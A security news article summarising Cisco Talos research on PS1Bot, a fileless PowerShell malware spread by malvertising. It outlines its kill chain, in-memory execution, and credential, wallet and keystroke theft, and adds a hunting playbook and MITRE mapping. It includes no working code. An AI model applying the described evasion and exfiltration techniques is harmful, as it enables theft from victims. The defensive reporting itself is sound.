data breaches
New PS1Bot Malware Uses Fileless PowerShell for Data Theft
Cisco Talos warns of a modular PowerShell/C# threat stealing wallets, logging keystrokes, and persisting without writing payloads to disk.
A new malvertising campaign is delivering PS1Bot, a modular malware framework that runs almost entirely in memory to avoid detection, Cisco Talos warns. It uses deceptive ads and SEO-poisoned downloads to deploy PowerShell loaders, which then pull modules for credential theft, keylogging, reconnaissance, and persistence — all without leaving major disk artifacts.
Security researchers on Wednesday warned that a stealthy malware called PS1Bot is being distributed through malicious ads and manipulated search results, using a multi-stage in-memory architecture to steal credentials, drain cryptocurrency wallets, and maintain persistence — all while leaving minimal forensic traces on infected systems.
Cisco Talos said the campaign has been active since early 2025, relying on ZIP archives that mimic popular search queries. Inside each archive is a JavaScript downloader that retrieves a scriptlet, which writes and launches a PowerShell loader. This loader contacts a command-and-control (C2) server, which delivers modules that never touch the disk.
Analysts Edmund Brumaghin and Jordyn Dunk described PS1Bot as a PowerShell/C# framework capable of antivirus discovery, screen capture, browser credential and wallet theft, keylogging, reconnaissance, and establishing persistence after reboot. Data theft is targeted: the malware scans for passwords, seed phrases, and crypto wallets, compresses the data, and exfiltrates it over HTTP.
Researchers also noted code and infrastructure overlaps with AHK Bot and activity linked to the Skitnet/Bossnet threat cluster, suggesting PS1Bot is part of a broader criminal toolkit.
“PS1Bot features a modular design … including information theft, keylogging, reconnaissance, and the establishment of persistent system access.” — Edmund Brumaghin & Jordyn Dunk, Cisco Talos.
“PS1Bot has been designed with stealth in mind, minimizing persistent artifacts … and incorporating in-memory execution techniques.” — Cisco Talos researchers.
“Malvertising at scale has impacted nearly one million devices in prior campaigns, showing how quickly threats can reach users via ads.” — Microsoft Threat Intelligence.
Deep Technical Analysis
Kill chain overview:
- Delivered via malvertising/SEO poisoning, a ZIP file contains a JavaScript downloader with embedded VBScript.
- This retrieves a JScript scriptlet that writes and executes a PowerShell loader (e.g.,
C:\ProgramData\ntu.ps1). - The loader derives a C2 URL from the system’s drive serial and uses Invoke-Expression (IEX) to run server-supplied PowerShell code entirely in memory.
Module architecture:
- C# modules compiled at runtime via Add-Type perform: AV discovery (via WMI), screen capture, credential/wallet theft, keylogging, reconnaissance, and persistence.
- Status is sent via HTTP GET parameters; bulk data is Base64-encoded and POSTed to the C2.
Data theft mechanics:
- Targets browser credential stores, wallet extensions, and files containing passwords or seed phrases.
- Uses keyword-based file hunts and exfiltrates seed phrases via HTTP GET requests in some cases.
Stealth tradecraft:
- Screenshots saved briefly as BMP in
%TEMP%, converted to JPEG in%APPDATA%, then deleted after upload. - Reduces on-disk footprint while allowing rapid capability updates from the C2.
Lineage:
- Overlaps with AHK Bot and Skitnet/Bossnet infrastructure point to experienced cybercriminal operators.
Detection & Hunting Playbook
Host telemetry (Windows):
- Look for PowerShell Operational 4104 logs with
Invoke-ExpressionandAdd-Typecalls, especially with large Base64 blobs. - Monitor WMI queries targeting antivirus software.
Filesystem artifacts:
- Ephemeral
ntu.ps1in ProgramData. - BMP→JPEG conversion pattern in
%TEMP%/%APPDATA%followed by deletion.
Network analytics:
- C2 requests embedding drive serials in URL paths.
- Mixed GET/POST usage for metadata and payloads.
Threat intel:
- Feed Talos’ published PS1Bot IoCs into SIEM/EDR blocklists.
Browser controls:
- Block ads, enforce verified download policies, and monitor for ZIP files named after trending documents or software.
MITRE ATT&CK Mapping
- Initial Access: T1189 Drive-by Compromise, T1190 Exploit Public-Facing Application (via poisoned sites).
- Execution: T1059.001 PowerShell, T1059.007 JavaScript/JScript.
- Defense Evasion: T1027 Obfuscated Files, T1218 Signed Binary Proxy Execution.
- Discovery: T1518.001 Security Software Discovery.
- Collection: T1113 Screen Capture, T1056.001 Keylogging, T1555 Credentials from Password Stores, T1552.004 Credentials in Files.
- Exfiltration: T1041 Exfiltration over C2 Channel.
- Persistence: T1547 Boot/Logon Autostart Execution.
Context & Background
Fileless and in-memory malware is increasingly common as attackers evade traditional file-based antivirus detection. PowerShell remains a top post-exploitation tool, prized for its flexibility and deep OS integration.
Malvertising, where malicious ads mimic legitimate download links, continues to be a high-ROI delivery vector — enabling threat actors to scale infections rapidly, often without needing to compromise popular websites directly.
Impact & Implications
Affected users: Individuals seeking free or pirated software, crypto tools, or common utilities are at highest risk.
Risks: Credential theft, cryptocurrency wallet drain, possible ransomware follow-on attacks.
Long-term: Could evolve into broader botnet campaigns using PS1Bot as an initial access platform.
Conclusion
PS1Bot demonstrates how modern threat actors are combining scalable initial access (malvertising) with fileless modular payloads to evade detection and prolong dwell time. Organizations should reinforce browser security, aggressively log and monitor PowerShell activity, and ensure their incident response teams can hunt for in-memory threats.